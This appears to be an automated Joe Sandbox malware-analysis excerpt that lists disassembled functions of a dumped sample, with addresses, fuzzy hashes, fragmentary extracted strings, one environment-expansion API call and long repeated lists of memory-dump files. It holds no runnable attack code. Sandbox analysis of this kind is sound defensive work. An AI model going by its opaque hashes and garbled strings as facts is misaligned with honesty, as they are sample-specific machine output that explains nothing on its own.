Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: InitializeThunk
String ID: _^]\$_^]\$f$fiP$jiP
API String ID: 2994545307-2734853458
Opcode ID: 06d317ff5292a905cd8dd472a9967a1ca94fdf89f68a9220ad67ed49a669bff3
Instruction ID: f753487c61867473e21996292ee03de7684fc4e1a5f7733a9e08125ffaec01f1
Opcode Fuzzy Hash: 06d317ff5292a905cd8dd472a9967a1ca94fdf89f68a9220ad67ed49a669bff3
Instruction Fuzzy Hash: E622F4B1A0D3419FD718CF29C890B2FBBE6ABD9314F198A2CF0A597395D670D8418B46

Function 00956D2E Relevance: 6.7, Strings: 5, Instructions: 482COMMON

Download Yara Rule

Strings

PV, xrefs: 00956DB3
\R, xrefs: 00956DAC
_^]\_^]\, xrefs: 00957064
uYD\, xrefs: 00956E3D
X^, xrefs: 00956DA5

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: _^]\_^]\$uYD\$PV$X^$\R
API String ID: 0-2314179683
Opcode ID: 0982675ae447242c4b9b7c6f43603b5c7b4a0372d364b851e50721b2227bd766
Instruction ID: da6ebb7a29df514e7f6fb636b7381253255bab42eaf6eaf86902016b6b1d0a7a
Opcode Fuzzy Hash: 0982675ae447242c4b9b7c6f43603b5c7b4a0372d364b851e50721b2227bd766
Instruction Fuzzy Hash: 31F1EDB2E18314CFDF14CFA9D8816AEBBB1FB49300F28446CDA56AB351D735A941CB90

Function 009524E0 Relevance: 6.6, Strings: 5, Instructions: 304COMMON

Download Yara Rule

Strings

=K0E, xrefs: 00952544
;GsA, xrefs: 00952520
.[TU, xrefs: 00952538
"_,Y, xrefs: 00952530
pCj], xrefs: 00952528

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: "_,Y$.[TU$;GsA$=K0E$pCj]
API String ID: 0-1171452581
Opcode ID: 957a3c24240c8f8c2625f70edcde8f08252e9aae5b89c321502eea8812cd6b80
Instruction ID: d3b10beb9e73fcfd2d214f69a938209e68c06a74c6c463130774227d7de1b10e
Opcode Fuzzy Hash: 957a3c24240c8f8c2625f70edcde8f08252e9aae5b89c321502eea8812cd6b80
Instruction Fuzzy Hash: 5E91F3B16083009BC724DF65C891B67B7B5EF96315F14882CFD8A8B291E375E90ACB52

Function 00948169 Relevance: 6.5, Strings: 5, Instructions: 299COMMON

Download Yara Rule

Strings

gfff, xrefs: 00948458
^`/4, xrefs: 009481E1
2h?n, xrefs: 009483A0
7, xrefs: 00948419
SP, xrefs: 00948396

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: 2h?n$7$SP$^`/4$gfff
API String ID: 0-3257051659
Opcode ID: 8d44ce49d1e0960b2a6b4a319b073df2d144a9f5aebc45588f8ab38cb932e79b
Instruction ID: 084a3eaa23ff49af3007a397c093b3ebe1a93efcfc61e84953810c17279d411b
Opcode Fuzzy Hash: 8d44ce49d1e0960b2a6b4a319b073df2d144a9f5aebc45588f8ab38cb932e79b
Instruction Fuzzy Hash: DDA15A72A183504BD314CF28CC51B6FB7D6FBC5318F198A3DE489D7395EA3888068B41

Function 00951340 Relevance: 5.5, Strings: 4, Instructions: 493COMMON

Download Yara Rule

Strings

{s, xrefs: 00951520
sp, xrefs: 00951528
eb, xrefs: 009516F6
9deZ, xrefs: 00951818

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: 9deZ$eb$sp${s
API String ID: 0-3993331145
Opcode ID: 3043a4da1f5474db2342937ce8f4faf19c4d3bd9c251ae24a6fb07b1e97a02dc
Instruction ID: 4bcb8990b8d27f231090d1f27a79fb991781396ca7d57f118982b221b87fd12e
Opcode Fuzzy Hash: 3043a4da1f5474db2342937ce8f4faf19c4d3bd9c251ae24a6fb07b1e97a02dc
Instruction Fuzzy Hash: 3AD107B15183048BC728DF25C8A176BB7F1FFD5355F089A1CE9968B3A0E7789904C752

Function 009591AE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 009591DA

Strings

wpq, xrefs: 009592B7
+Ku, xrefs: 009592AF

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +Ku$wpq
API String ID: 237503144-1953850642
Opcode ID: 2691308f7a766e19840936cfa0da678310c7420df7fc52488df9fc2c6fbd053d
Instruction ID: e54b0d6cdf54cc45a4619df81fbfb6f6d45971fd6e77164dfbcbac5038b92d1b
Opcode Fuzzy Hash: 2691308f7a766e19840936cfa0da678310c7420df7fc52488df9fc2c6fbd053d
Instruction Fuzzy Hash: 7651CE7221C3158FC324CF69984076FB7E6EBC5310F55892EE4AACB285DB34D50A8B92

Function 00967DA9 Relevance: 5.4, Strings: 4, Instructions: 421COMMON

Download Yara Rule

Strings

], xrefs: 0096824A
_, xrefs: 00968242
\, xrefs: 0096824E
^, xrefs: 00968246

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
